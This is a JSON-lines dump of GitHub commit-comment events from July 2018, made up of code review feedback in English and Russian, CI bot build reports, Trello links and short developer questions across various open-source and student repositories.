{"id":"8005917498","type":"CommitCommentEvent","actor":{"login":"ruthemmanuelle"},"repo":{"name":"forcedotcom/salesforcedx-vscode"},"payload":{"comment":{"id":29804778,"position":5,"line":55,"path":"packages/salesforcedx-vscode-core/package.nls.json","commit_id":"8d679183fe0746a2c2f65177ef21a07f7b249e50","created_at":"2018-07-23T19:22:59Z","updated_at":"2018-07-23T19:22:59Z","author_association":"CONTRIBUTOR","body":"\"SFDX: Create Project with Manifest\" sounds good to me. This PR is already closed, so we should create a new work item for this change."}},"created_at":"2018-07-23T19:22:59Z"}
{"id":"8005918879","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/nb2plots-feedstock"},"payload":{"comment":{"id":29804780,"position":null,"line":null,"path":null,"commit_id":"d646b1a5d6e3075c28f5629b31e37d9af0d47b9a","created_at":"2018-07-23T19:23:17Z","updated_at":"2018-07-23T19:23:17Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @curtlh was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T19:23:17Z"}
{"id":"8005922280","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Kong/kong"},"payload":{"comment":{"id":29804784,"position":97,"line":97,"path":".ci/trigger-travis.sh","commit_id":"90096fb35eda8da7e86d43b101a44e6827d4d67c","created_at":"2018-07-23T19:23:58Z","updated_at":"2018-07-23T19:23:58Z","author_association":"MEMBER","body":"Since 0.14.0, we also provide RHEL 6 & 7. If we do not include them here, this would mean that the next release would still have to manually build the base images, and run the packaging and release script."}},"created_at":"2018-07-23T19:23:58Z"}
{"id":"8005924345","type":"CommitCommentEvent","actor":{"login":"AdeelKhan541"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804786,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T19:24:24Z","updated_at":"2018-07-23T19:24:24Z","author_association":"NONE","body":"Very Good Project"}},"created_at":"2018-07-23T19:24:24Z"}
{"id":"8005947922","type":"CommitCommentEvent","actor":{"login":"Beneboe"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29804861,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T19:29:22Z","updated_at":"2018-07-23T19:29:22Z","author_association":"COLLABORATOR","body":"I'll look into it on Friday."}},"created_at":"2018-07-23T19:29:22Z"}
{"id":"8005948756","type":"CommitCommentEvent","actor":{"login":"Benerdchia"},"repo":{"name":"projectkudu/ARMClient"},"payload":{"comment":{"id":29804862,"position":null,"line":null,"path":null,"commit_id":"42e1f147bc6be9f2e2c08f70da8fe16a1c7758d7","created_at":"2018-07-23T19:29:31Z","updated_at":"2018-07-23T19:29:31Z","author_association":"NONE","body":"#42e1f14 "}},"created_at":"2018-07-23T19:29:31Z"}
{"id":"8005949585","type":"CommitCommentEvent","actor":{"login":"thaddeuslax14"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804864,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T19:29:42Z","updated_at":"2018-07-23T19:29:42Z","author_association":"NONE","body":"Gonna be a good one!  "}},"created_at":"2018-07-23T19:29:42Z"}
{"id":"8005950625","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29804868,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T19:29:53Z","updated_at":"2018-07-23T19:29:53Z","author_association":"COLLABORATOR","body":"> Обычно используют для ячейки, высота которой заранее не известна.\r\n\r\nНе обязательно. Просто, когда высота вычисляется AutoLayout'ом, можно использовать эту штуку.\r\n\r\nА как ты меняешь высоту? Почему, что именно не получается? Что у тебя проставлено в estimatedRowHeight?"}},"created_at":"2018-07-23T19:29:53Z"}
{"id":"8005953910","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804876,"position":null,"line":null,"path":null,"commit_id":"3104dffc982cb70853e9f1fd449f8c6544d2bd60","created_at":"2018-07-23T19:30:33Z","updated_at":"2018-07-23T19:30:33Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-967](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-967).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-967-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T19:30:33Z"}
{"id":"8005959775","type":"CommitCommentEvent","actor":{"login":"rjuju"},"repo":{"name":"powa-team/powa-archivist"},"payload":{"comment":{"id":29804885,"position":null,"line":null,"path":null,"commit_id":"7456771e769547bac01d4331e1a294f34f70c33c","created_at":"2018-07-23T19:31:42Z","updated_at":"2018-07-23T19:31:42Z","author_association":"MEMBER","body":"I just modified it!"}},"created_at":"2018-07-23T19:31:42Z"}
{"id":"8005962025","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804890,"position":10,"line":10,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:32:08Z","updated_at":"2018-07-23T19:32:08Z","author_association":"NONE","body":"Тут немного не верно, у тебя должен быть массив станций (именно объектов класса Station) - первая, последняя и промежуточные. Хэш здесь не очень подходит"}},"created_at":"2018-07-23T19:32:08Z"}
{"id":"8005963857","type":"CommitCommentEvent","actor":{"login":"devapromix"},"repo":{"name":"gwathlobal/CotD"},"payload":{"comment":{"id":29804899,"position":null,"line":null,"path":null,"commit_id":"9ecf649af5dd9632eae4d45c726ace0d1aeb494e","created_at":"2018-07-23T19:32:30Z","updated_at":"2018-07-23T19:32:30Z","author_association":"NONE","body":"Привет! Извини за оффтоп, но что с форумом?"}},"created_at":"2018-07-23T19:32:30Z"}
{"id":"8005964122","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804901,"position":24,"line":24,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:32:33Z","updated_at":"2018-07-23T19:32:33Z","author_association":"NONE","body":"Соответственно все эти методы тоже надо будет подправить"}},"created_at":"2018-07-23T19:32:33Z"}
{"id":"8005964601","type":"CommitCommentEvent","actor":{"login":"yanfali"},"repo":{"name":"qmk/qmk_configurator"},"payload":{"comment":{"id":29804902,"position":6,"line":2296,"path":"assets/js/script.js","commit_id":"718e628d4b1cbab992cc481e5ef79b390ff95cef","created_at":"2018-07-23T19:32:39Z","updated_at":"2018-07-23T19:32:39Z","author_association":"COLLABORATOR","body":"LOL"}},"created_at":"2018-07-23T19:32:39Z"}
{"id":"8005966084","type":"CommitCommentEvent","actor":{"login":"ascherer"},"repo":{"name":"ascherer/cwebtest"},"payload":{"comment":{"id":29804905,"position":null,"line":null,"path":null,"commit_id":"cd4bd899745fc8f483421f80c13b530371e707ed","created_at":"2018-07-23T19:32:58Z","updated_at":"2018-07-23T19:32:58Z","author_association":"OWNER","body":"Instead of using `uname` test `getopt -T` and check for exit status `4`."}},"created_at":"2018-07-23T19:32:58Z"}
{"id":"8005966613","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29804907,"position":null,"line":null,"path":null,"commit_id":"dc04657b37a09def6dad4472c1d2a2400b574fcc","created_at":"2018-07-23T19:33:05Z","updated_at":"2018-07-23T19:33:05Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-23T19:33:05Z"}
{"id":"8005967456","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804910,"position":27,"line":27,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:33:14Z","updated_at":"2018-07-23T19:33:14Z","author_association":"NONE","body":"Зачем создаешь локальную переменную, которая нигде потом не используется?"}},"created_at":"2018-07-23T19:33:14Z"}
{"id":"8005967479","type":"CommitCommentEvent","actor":{"login":"jlaine"},"repo":{"name":"jlaine/aiortc"},"payload":{"comment":{"id":29804911,"position":null,"line":null,"path":null,"commit_id":"71b3349472f8dc38a63063f81f101c06fff38e81","created_at":"2018-07-23T19:33:15Z","updated_at":"2018-07-23T19:33:15Z","author_association":"OWNER","body":"It's part of the spec, I hadn't got round to implementing it ;)"}},"created_at":"2018-07-23T19:33:15Z"}
{"id":"8005970920","type":"CommitCommentEvent","actor":{"login":"maxshuty"},"repo":{"name":"arachnys/athenapdf"},"payload":{"comment":{"id":29804917,"position":12,"line":12,"path":"pkg/runner/plugin/js/window-status.js","commit_id":"bdd4c5559b334c2a27a20a6265b9d16c9a8f8065","created_at":"2018-07-23T19:33:59Z","updated_at":"2018-07-23T19:33:59Z","author_association":"NONE","body":"I believe this should be `if (typeof WINDOW_STATUS === \"undefined\")`, not `!==`."}},"created_at":"2018-07-23T19:33:59Z"}
{"id":"8005971614","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29804919,"position":55,"line":39,"path":"src/main/java/htsjdk/utils/converterToDatabase/ConverterToDatabase.java","commit_id":"dfd4a6e2b3e32e5cae12bca44e776117c8bd5cc9","created_at":"2018-07-23T19:34:08Z","updated_at":"2018-07-23T19:34:08Z","author_association":"OWNER","body":"try лучше использовать 1 раз\r\n"}},"created_at":"2018-07-23T19:34:08Z"}
{"id":"8005972573","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804920,"position":35,"line":35,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:34:21Z","updated_at":"2018-07-23T19:34:21Z","author_association":"NONE","body":"Создавать поезд, который будет иметь скорость не равную 0 не имеет смысла."}},"created_at":"2018-07-23T19:34:21Z"}
{"id":"8005975899","type":"CommitCommentEvent","actor":{"login":"coreyfarrell"},"repo":{"name":"coreyfarrell/sver-compat"},"payload":{"comment":{"id":29804928,"position":null,"line":null,"path":null,"commit_id":"8e6338f0a60d9bf2c175f99f4bee09cadc0c38cc","created_at":"2018-07-23T19:35:03Z","updated_at":"2018-07-23T19:35:03Z","author_association":"OWNER","body":"@phated I was just experimenting with some dependencies to see if I could eliminate core-js, I tried switching from sver-compat to sver but it gave me a test failure (I didn't investigate further).  I was just using github as an easy URL to install from, I hadn't expected notifications to go out about these commits."}},"created_at":"2018-07-23T19:35:03Z"}
{"id":"8005977502","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/java_2018_summer_sunday_home_works"},"payload":{"comment":{"id":29804931,"position":15,"line":15,"path":"src/lesson4/user/User.java","commit_id":"19a6f35b10cc3751aa6ba9f3759531e137f3c947","created_at":"2018-07-23T19:35:22Z","updated_at":"2018-07-23T19:35:22Z","author_association":"CONTRIBUTOR","body":"Для проверки строк (Объектов) на идентичность необходимо использовать метод equals, а не =="}},"created_at":"2018-07-23T19:35:22Z"}
{"id":"8005978936","type":"CommitCommentEvent","actor":{"login":"MrSaints"},"repo":{"name":"arachnys/athenapdf"},"payload":{"comment":{"id":29804933,"position":12,"line":12,"path":"pkg/runner/plugin/js/window-status.js","commit_id":"bdd4c5559b334c2a27a20a6265b9d16c9a8f8065","created_at":"2018-07-23T19:35:40Z","updated_at":"2018-07-23T19:35:40Z","author_association":"COLLABORATOR","body":"Good catch! Mind putting a PR in for this?"}},"created_at":"2018-07-23T19:35:40Z"}
{"id":"8005980286","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/java_2018_summer_sunday_home_works"},"payload":{"comment":{"id":29804936,"position":11,"line":11,"path":"src/lesson4/user/User.java","commit_id":"19a6f35b10cc3751aa6ba9f3759531e137f3c947","created_at":"2018-07-23T19:35:56Z","updated_at":"2018-07-23T19:35:56Z","author_association":"CONTRIBUTOR","body":"А для чего тогда у пользователя поле \"пароль\" если оно не используется?"}},"created_at":"2018-07-23T19:35:56Z"}
{"id":"8005981428","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804940,"position":43,"line":43,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:36:11Z","updated_at":"2018-07-23T19:36:11Z","author_association":"NONE","body":"Забыл tab. Помни, что код должен выглядеть однородно (не забывай про [style guide](https://github.com/rubocop-hq/ruby-style-guide))"}},"created_at":"2018-07-23T19:36:11Z"}
{"id":"8005982148","type":"CommitCommentEvent","actor":{"login":"dotpiatka"},"repo":{"name":"dotpiatka/testowy"},"payload":{"comment":{"id":29804941,"position":1,"line":1,"path":"test2","commit_id":"792d73f9d9eda645dcf924097b642d8ebe423a31","created_at":"2018-07-23T19:36:20Z","updated_at":"2018-07-23T19:36:20Z","author_association":"OWNER","body":"none\r\n"}},"created_at":"2018-07-23T19:36:20Z"}
{"id":"8005985843","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/java_2018_summer_sunday_home_works"},"payload":{"comment":{"id":29804946,"position":31,"line":31,"path":"src/lesson4/user/User.java","commit_id":"19a6f35b10cc3751aa6ba9f3759531e137f3c947","created_at":"2018-07-23T19:37:08Z","updated_at":"2018-07-23T19:37:08Z","author_association":"CONTRIBUTOR","body":"Лекция 5 поможет разобраться с toString и equals."}},"created_at":"2018-07-23T19:37:08Z"}
{"id":"8005986386","type":"CommitCommentEvent","actor":{"login":"dotpiatka"},"repo":{"name":"dotpiatka/testowy"},"payload":{"comment":{"id":29804948,"position":3,"line":3,"path":"test2","commit_id":"792d73f9d9eda645dcf924097b642d8ebe423a31","created_at":"2018-07-23T19:37:15Z","updated_at":"2018-07-23T19:37:15Z","author_association":"OWNER","body":"none\r\n"}},"created_at":"2018-07-23T19:37:15Z"}
{"id":"8005988226","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"coreyfarrell/sver-compat"},"payload":{"comment":{"id":29804953,"position":null,"line":null,"path":null,"commit_id":"8e6338f0a60d9bf2c175f99f4bee09cadc0c38cc","created_at":"2018-07-23T19:37:37Z","updated_at":"2018-07-23T19:37:37Z","author_association":"NONE","body":"Ah makes sense. I saw the notice and didn't want to take anything away from the original author's work.  What's core-js?"}},"created_at":"2018-07-23T19:37:37Z"}
{"id":"8005991079","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29804958,"position":42,"line":42,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T19:38:12Z","updated_at":"2018-07-23T19:38:12Z","author_association":"NONE","body":"Видимо, использование нижнего подчёркивания здесь - это последствия смущения от аббревиатур. Если не боятся писать аббревиатуры со строчной, то и подчёркивание не потребуется - обычная camel-нотация. В целом, нижнее подчёркивание (snake_case) используется в Java только для имён констант, мы их будет проходить позже\r\n- [ ] Избавиться от "}},"created_at":"2018-07-23T19:38:12Z"}
{"id":"8005991560","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29804960,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-23T19:38:19Z","updated_at":"2018-07-23T19:38:19Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-MacOS-10.9-clang: OK (2925 of 2948 tests passed, 15 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 21 tests had: Table big diffs.\n * 5 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 4 tests had: MTR small diffs.\n * 5 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\nregression Test Summary\n * Passed: 601\n * Failed: 22\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.22%25-yellow.png)</a> \n"}},"created_at":"2018-07-23T19:38:19Z"}
{"id":"8005992207","type":"CommitCommentEvent","actor":{"login":"maxshuty"},"repo":{"name":"arachnys/athenapdf"},"payload":{"comment":{"id":29804964,"position":12,"line":12,"path":"pkg/runner/plugin/js/window-status.js","commit_id":"bdd4c5559b334c2a27a20a6265b9d16c9a8f8065","created_at":"2018-07-23T19:38:27Z","updated_at":"2018-07-23T19:38:27Z","author_association":"NONE","body":"I should be able to get one up tonight. Thanks :) "}},"created_at":"2018-07-23T19:38:27Z"}
{"id":"8005995237","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29804968,"position":66,"line":66,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:39:08Z","updated_at":"2018-07-23T19:39:08Z","author_association":"NONE","body":"train_trace_list[0][1] не понятно, что это такое? Особенно [0][1], уверен этот код можно значительно улучшить. Если нужна будет подсказка, напиши мне в slack - mr-koww"}},"created_at":"2018-07-23T19:39:08Z"}
{"id":"8005998241","type":"CommitCommentEvent","actor":{"login":"Qadeer1123"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804973,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T19:39:45Z","updated_at":"2018-07-23T19:39:45Z","author_association":"NONE","body":"Nice Project "}},"created_at":"2018-07-23T19:39:45Z"}
{"id":"8006001604","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/java_2018_summer_sunday_home_works"},"payload":{"comment":{"id":29804979,"position":16,"line":33,"path":"src/lesson3/product/product.java","commit_id":"0fb61cf9c10d8eeb293c6547d4ec42c6b3cd05f1","created_at":"2018-07-23T19:40:23Z","updated_at":"2018-07-23T19:40:23Z","author_association":"CONTRIBUTOR","body":"Лучше тогда сразу использовать BigDecimal а не float в \"состоянии\" объекта"}},"created_at":"2018-07-23T19:40:23Z"}
{"id":"8006003409","type":"CommitCommentEvent","actor":{"login":"melissamas"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29804982,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-23T19:40:45Z","updated_at":"2018-07-23T19:40:45Z","author_association":"NONE","body":"How do I change my directory to the folder?\n\nOn Mon, Jul 23, 2018, 10:20 AM MsCrystal1 <notifications@github.com> wrote:\n\n> I had the same issue as a windows user it appears when running the program\n> you don't have to call python. You just need to change your directory to\n> the folder where the file is stored. Once you've completed this step simply\n> type Calc.py and then press enter you should get your desired results.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/1millionwomentotech/toolkitten/commit/1a12f041f1de0fdc85919d021b663eabc13345c2#commitcomment-29803346>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnZTQKaq6PpjjD0tCoOZlBsnnA-hVAsEks5uJgXugaJpZM4VQ4vT>\n> .\n>\n"}},"created_at":"2018-07-23T19:40:45Z"}
{"id":"8006008011","type":"CommitCommentEvent","actor":{"login":"Reza1000"},"repo":{"name":"Reza1000/GitOne"},"payload":{"comment":{"id":29804990,"position":4,"line":13,"path":"GitOneProject/GitOneProject/Program.cs","commit_id":"1f3e70b65ad23cd5bb8a8cedf8e57d39f314e441","created_at":"2018-07-23T19:41:40Z","updated_at":"2018-07-23T19:41:40Z","author_association":"OWNER","body":"The first method."}},"created_at":"2018-07-23T19:41:40Z"}
{"id":"8006008456","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29804991,"position":null,"line":null,"path":null,"commit_id":"108c7bbf578b157e983088c0cedbb2e7316219f0","created_at":"2018-07-23T19:41:45Z","updated_at":"2018-07-23T19:41:45Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Usar a estatísticas disponível em http://redenorte.ufam.edu.br/](https://trello.com/c/lZh4V5zo/15-usar-a-estat%C3%ADsticas-dispon%C3%ADvel-em-http-redenorteufamedubr)"}},"created_at":"2018-07-23T19:41:45Z"}
{"id":"8006009483","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29804994,"position":null,"line":null,"path":null,"commit_id":"9b469e4f31fd7fa2b959e18dbd0118d4fc57fc97","created_at":"2018-07-23T19:41:57Z","updated_at":"2018-07-23T19:41:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Usar a estatísticas disponível em http://redenorte.ufam.edu.br/](https://trello.com/c/lZh4V5zo/15-usar-a-estat%C3%ADsticas-dispon%C3%ADvel-em-http-redenorteufamedubr)"}},"created_at":"2018-07-23T19:41:57Z"}
{"id":"8006010899","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29804998,"position":null,"line":null,"path":null,"commit_id":"9b469e4f31fd7fa2b959e18dbd0118d4fc57fc97","created_at":"2018-07-23T19:42:14Z","updated_at":"2018-07-23T19:42:14Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adicção de novo logo](https://trello.com/c/fnyHxsdD/37-adic%C3%A7%C3%A3o-de-novo-logo)"}},"created_at":"2018-07-23T19:42:14Z"}
{"id":"8006012389","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29805001,"position":null,"line":null,"path":null,"commit_id":"9b469e4f31fd7fa2b959e18dbd0118d4fc57fc97","created_at":"2018-07-23T19:42:33Z","updated_at":"2018-07-23T19:42:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mudar o layout do rodapé colocando os links  Instagram, face e Rede Norte de repositórios](https://trello.com/c/m2JeKmMh/28-mudar-o-layout-do-rodap%C3%A9-colocando-os-links-instagram-face-e-rede-norte-de-reposit%C3%B3rios)"}},"created_at":"2018-07-23T19:42:33Z"}
{"id":"8006012415","type":"CommitCommentEvent","actor":{"login":"SirSerje"},"repo":{"name":"mikach/web-app-optimization-demo"},"payload":{"comment":{"id":29805002,"position":null,"line":null,"path":null,"commit_id":"b23e064dea6e2b817e3665428ff3448cd0b5b951","created_at":"2018-07-23T19:42:33Z","updated_at":"2018-07-23T19:42:33Z","author_association":"NONE","body":"Можно выложить к этому репозиторию презентацию или приложить ссылку на неё?"}},"created_at":"2018-07-23T19:42:33Z"}
{"id":"8006013508","type":"CommitCommentEvent","actor":{"login":"Coolfin210"},"repo":{"name":"Jamezo97/CloneCraft"},"payload":{"comment":{"id":29805004,"position":null,"line":null,"path":null,"commit_id":"8725e2b1d970433e3d8913553a1817b0d44f3f58","created_at":"2018-07-23T19:42:47Z","updated_at":"2018-07-23T19:42:47Z","author_association":"NONE","body":"Do I apply this to my current clonecraft or is this updated on a different version?\r\n"}},"created_at":"2018-07-23T19:42:47Z"}
{"id":"8006014106","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29805008,"position":null,"line":null,"path":null,"commit_id":"9b469e4f31fd7fa2b959e18dbd0118d4fc57fc97","created_at":"2018-07-23T19:42:54Z","updated_at":"2018-07-23T19:42:54Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mudar o Menu Documentos uteis para serviços para o autor](https://trello.com/c/YiQU6IGE/11-mudar-o-menu-documentos-uteis-para-servi%C3%A7os-para-o-autor)"}},"created_at":"2018-07-23T19:42:54Z"}
{"id":"8006014117","type":"CommitCommentEvent","actor":{"login":"daenub"},"repo":{"name":"daenub/react-native-qrcode-scanner"},"payload":{"comment":{"id":29805009,"position":null,"line":null,"path":null,"commit_id":"326803ca247e328abad6c5d221dbeff20d853bbe","created_at":"2018-07-23T19:42:54Z","updated_at":"2018-07-23T19:42:54Z","author_association":"OWNER","body":"Thanks! :)"}},"created_at":"2018-07-23T19:42:54Z"}
{"id":"8006019816","type":"CommitCommentEvent","actor":{"login":"coreyfarrell"},"repo":{"name":"coreyfarrell/sver-compat"},"payload":{"comment":{"id":29805021,"position":null,"line":null,"path":null,"commit_id":"8e6338f0a60d9bf2c175f99f4bee09cadc0c38cc","created_at":"2018-07-23T19:44:04Z","updated_at":"2018-07-23T19:44:04Z","author_association":"OWNER","body":"It's about 7.6MB, provides ponyfills for things like Object.assign, Array.forEach, Array.map."}},"created_at":"2018-07-23T19:44:04Z"}
{"id":"8006033001","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29805053,"position":5,"line":5,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T19:46:42Z","updated_at":"2018-07-23T19:46:42Z","author_association":"NONE","body":"Ты наверно сам класс убираешь, имя, которое идёт перед точкой: **Computer**.computerTurnOn(); А я говорю про имя класса в имени метода:  Computer.**computer**TurnOn();"}},"created_at":"2018-07-23T19:46:42Z"}
{"id":"8006035717","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805056,"position":88,"line":88,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:47:17Z","updated_at":"2018-07-23T19:47:17Z","author_association":"NONE","body":"Этот код можно значительно упростить\r\nЕсли нужна будет подсказка, напиши мне в slack - mr-koww"}},"created_at":"2018-07-23T19:47:17Z"}
{"id":"8006036501","type":"CommitCommentEvent","actor":{"login":"ernius"},"repo":{"name":"astump/cedilleum-spec"},"payload":{"comment":{"id":29805058,"position":null,"line":null,"path":null,"commit_id":"d57226c0ed6de3282ba38b538e65d0b107e64f3e","created_at":"2018-07-23T19:47:28Z","updated_at":"2018-07-23T19:47:28Z","author_association":"COLLABORATOR","body":"In next example:\r\n\r\nμ(len, Vec/len, toVec/len, xs, Λ n. λ x. Nat, \r\n     Λ n. Λ eq. zero\r\n     Λ n. Λ m. λ x. λ xs. Λ eq. suc (len -n xs)\r\n\r\nThe last expression (len -n **xs**) should not be (len -n (**toVec/len xs**)) ?"}},"created_at":"2018-07-23T19:47:28Z"}
{"id":"8006036928","type":"CommitCommentEvent","actor":{"login":"jgravois"},"repo":{"name":"Esri/arcgis-rest-js"},"payload":{"comment":{"id":29805060,"position":null,"line":null,"path":null,"commit_id":"7b45f4bf2a436bd4785915dbb0e70633d9edd251","created_at":"2018-07-23T19:47:34Z","updated_at":"2018-07-23T19:47:34Z","author_association":"MEMBER","body":"very cool! can you open up a _wip_ pull request?"}},"created_at":"2018-07-23T19:47:34Z"}
{"id":"8006039396","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29805066,"position":null,"line":null,"path":null,"commit_id":"9acee953d9b270cf4fe8ede42d66529b8d960779","created_at":"2018-07-23T19:48:06Z","updated_at":"2018-07-23T19:48:06Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.369`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407310378) :tada:"}},"created_at":"2018-07-23T19:48:06Z"}
{"id":"8006039676","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805067,"position":35,"line":34,"path":"spec/features/checkout_movies_spec.rb","commit_id":"17014bff5e55d3c143d7fa0966aed3c459d03577","created_at":"2018-07-23T19:48:09Z","updated_at":"2018-07-23T19:48:09Z","author_association":"NONE","body":"git diff\r\n\r\nAntes del commit para asegurarse de los cambios."}},"created_at":"2018-07-23T19:48:09Z"}
